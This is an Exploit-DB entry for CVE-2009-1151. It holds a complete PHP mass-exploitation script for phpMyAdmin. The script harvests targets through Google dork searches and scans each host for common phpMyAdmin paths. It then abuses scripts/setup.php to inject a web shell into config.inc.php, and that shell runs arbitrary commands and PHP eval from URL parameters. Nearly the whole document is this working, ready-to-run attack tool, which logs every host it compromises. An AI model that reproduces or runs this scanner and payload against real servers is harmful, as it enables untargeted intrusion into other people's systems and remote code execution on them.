phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution

EDB-ID:

8992

CVE:

2009-1151

EDB Verified:

Author:

Hacking Expose!

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-06-22

Vulnerable App: 
<?php

$list = array(
'/phpmyadmin/',
'/phpMyAdmin/', 
'/PMA/',
'/pma/', 
'/admin/', 
'/dbadmin/', 
'/mysql/', 
'/myadmin/', 
'/phpmyadmin2/', 
'/phpMyAdmin2/', 
'/phpMyAdmin-2/', 
'/php-my-admin/', 
'/phpMyAdmin-2.2.3/', 
'/phpMyAdmin-2.2.6/', 
'/phpMyAdmin-2.5.1/', 
'/phpMyAdmin-2.5.4/', 
'/phpMyAdmin-2.5.5-rc1/', 
'/phpMyAdmin-2.5.5-rc2/', 
'/phpMyAdmin-2.5.5/', 
'/phpMyAdmin-2.5.5-pl1/', 
'/phpMyAdmin-2.5.6-rc1/', 
'/phpMyAdmin-2.5.6-rc2/', 
'/phpMyAdmin-2.5.6/', 
'/phpMyAdmin-2.5.7/', 
'/phpMyAdmin-2.5.7-pl1/', 
'/phpMyAdmin-2.6.0-alpha/', 
'/phpMyAdmin-2.6.0-alpha2/', 
'/phpMyAdmin-2.6.0-beta1/', 
'/phpMyAdmin-2.6.0-beta2/', 
'/phpMyAdmin-2.6.0-rc1/', 
'/phpMyAdmin-2.6.0-rc2/', 
'/phpMyAdmin-2.6.0-rc3/', 
'/phpMyAdmin-2.6.0/', 
'/phpMyAdmin-2.6.0-pl1/', 
'/phpMyAdmin-2.6.0-pl2/', 
'/phpMyAdmin-2.6.0-pl3/', 
'/phpMyAdmin-2.6.1-rc1/', 
'/phpMyAdmin-2.6.1-rc2/', 
'/phpMyAdmin-2.6.1/', 
'/phpMyAdmin-2.6.1-pl1/', 
'/phpMyAdmin-2.6.1-pl2/', 
'/phpMyAdmin-2.6.1-pl3/', 
'/phpMyAdmin-2.6.2-rc1/', 
'/phpMyAdmin-2.6.2-beta1/', 
'/phpMyAdmin-2.6.2-rc1/', 
'/phpMyAdmin-2.6.2/', 
'/phpMyAdmin-2.6.2-pl1/', 
'/phpMyAdmin-2.6.3/', 
'/phpMyAdmin-2.6.3-rc1/', 
'/phpMyAdmin-2.6.3/', 
'/phpMyAdmin-2.6.3-pl1/', 
'/phpMyAdmin-2.6.4-rc1/', 
'/phpMyAdmin-2.6.4-pl1/', 
'/phpMyAdmin-2.6.4-pl2/', 
'/phpMyAdmin-2.6.4-pl3/', 
'/phpMyAdmin-2.6.4-pl4/', 
'/phpMyAdmin-2.6.4/', 
'/phpMyAdmin-2.7.0-beta1/', 
'/phpMyAdmin-2.7.0-rc1/', 
'/phpMyAdmin-2.7.0-pl1/', 
'/phpMyAdmin-2.7.0-pl2/', 
'/phpMyAdmin-2.7.0/', 
'/phpMyAdmin-2.8.0-beta1/', 
'/phpMyAdmin-2.8.0-rc1/', 
'/phpMyAdmin-2.8.0-rc2/', 
'/phpMyAdmin-2.8.0/', 
'/phpMyAdmin-2.8.0.1/', 
'/phpMyAdmin-2.8.0.2/', 
'/phpMyAdmin-2.8.0.3/', 
'/phpMyAdmin-2.8.0.4/', 
'/phpMyAdmin-2.8.1-rc1/', 
'/phpMyAdmin-2.8.1/', 
'/phpMyAdmin-2.8.2/', 
'/sqlmanager/', 
'/mysqlmanager/', 
'/p/m/a/', 
'/PMA2005/', 
'/pma2005/', 
'/phpmanager/', 
'/php-myadmin/', 
'/phpmy-admin/', 
'/webadmin/', 
'/sqlweb/', 
'/websql/', 
'/webdb/', 
'/mysqladmin/', 
'/mysql-admin/',
);

if($argc > 1) {
	print "|****************************************************************|\n";
	print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
	print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
	print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
	print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
	print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
	print "|****************************************************************|\n";
	print "\n";
	print "Usage: php $argv[0] \n";
	exit;
}

	print "|****************************************************************|\n";
	print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
	print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
	print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
	print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
	print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
	print "|****************************************************************|\n";
	print "\n";
	$Handlex = FOpen("pmaPWN.log", "a+");
	FWrite($Handlex, "|****************************************************************|\n");
	FWrite($Handlex, "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
	FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit\n");
	FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921\n");
	FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org\n");
	FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de\n");
	FWrite($Handlex, "|****************************************************************|\n\n");
    print "[-] Master, where you want to go today? \n";
	print "[-] example dork: intitle:phpMyAdmin \n";
    fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
    $dork = trim(fgets(STDIN));
    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
	FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
    for($i = 0; $i <= 900; $i+=100) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
	curl_close($ch);

    if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
	}
	
    foreach($res as $key) {
        foreach($key as $target) {
            $total++;
        }
    }
    print "[+] Done. $total rows return.\n";
	FWrite($Handlex, "[+] Done. $total rows return.\n");
	FClose($Handlex);
    foreach($res as $key) {
        foreach($key as $target) {
			$Handlex = FOpen("pmaPWN.log", "a+");
			$real = parse_url($target);
			$url = "http://".$real['host'];
			print "\n[-] Scanning phpMyAdmin on ".$url."\n";
			FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
			FClose($Handlex);
			sleep(5);
			$curlHandle = curl_multi_init();
			for ($i = 0;$i < count($list); $i++)
			$curl[$i] = addHandle($curlHandle,$url.$list[$i]);
			ExecHandle($curlHandle);
			for ($i = 0;$i < count($list); $i++)
			{			
				$text[$i] =  curl_multi_getcontent ($curl[$i]);
				//echo $url.$list[$i]."\n";
				$Handlex = FOpen("pmaPWN.log", "a+");
				if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
				print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
				print "\n[+] Testing vulnerable, wait sec..\n";
				FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
				FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
					if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
						print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
						FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
					}
				FClose($Handlex);
				exploit_site($url.$list[$i]);
				}
			}
			for ($i = 0;$i < count($list); $i++)//remove the handles
			curl_multi_remove_handle($curlHandle,$curl[$i]);
			curl_multi_close($curlHandle);
			sleep(5);
		}
    }

function addHandle(&$curlHandle,$url)
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_HEADER, 0);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($curlHandle,$cURL);
return $cURL;
}
//execute the handle until the flag passed
// to function is greater then 0
function ExecHandle(&$curlHandle)
{
$flag=null;
do {
//fetch pages in parallel
curl_multi_exec($curlHandle,$flag);
} while ($flag > 0);
}

function exploit_site($url) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_TIMEOUT, 200);
	curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
	$result = curl_exec($ch);
	curl_close($ch);
	$ch2 = curl_init();
	curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch2, CURLOPT_HEADER, 1);
	curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
	curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
	$result2 = curl_exec($ch2);
	curl_close($ch2);
	//print $url;
	if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
		print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
		print "\n[+] Exploiting, wait sec..\n";
		$Handlex = FOpen("pmaPWN.log", "a+");
		FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
		FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
		FClose($Handlex);
		exploit($url);
	}
	else {
		$Handlex = FOpen("pmaPWN.log", "a+");
		print "\n[-] Shit! no luck.. not vulnerable\n";
		FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
		FClose($Handlex);
	}
}

	function exploit($w00t) {
		$Handlex = FOpen("pmaPWN.log", "a+");
		$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox 
		//first get cookie + token 
		$curl = curl_init(); 
		curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL 
		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
		curl_setopt($curl, CURLOPT_USERAGENT, $useragent); 
		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($curl, CURLOPT_TIMEOUT, 200); 
		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); 
		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); 		
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string 
		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); 
		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); 
		$result = curl_exec($curl);
		curl_close($curl);
		if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
		
		$token = $matches[1][1];
		if ($token != '') {
		print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
		FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
		$payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
		print "\n[+] Sending evil payload mwahaha.. \n";
		FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
		$curl = curl_init(); 
		curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); 
		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
		curl_setopt($curl, CURLOPT_TIMEOUT, 200);
		curl_setopt($curl, CURLOPT_USERAGENT, $useragent); 
		curl_setopt($curl, CURLOPT_REFERER, $w00t); 
		curl_setopt($curl, CURLOPT_POST, true); 
		curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); 
		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); 
		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); 
		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3); 
		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); 
		$result = curl_exec($curl);
		curl_close($curl);
		
		print "\n[!] w00t! w00t! You should now have shell here";
		print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
		print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
		FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
		FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
		
		}
		else {
			print "\n[!] Shit! no luck.. not vulnerable\n";
			FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
			return false;
		}
		FClose($Handlex);
		if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
		//exit();
	}

?>

# milw0rm.com [2009-06-22]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services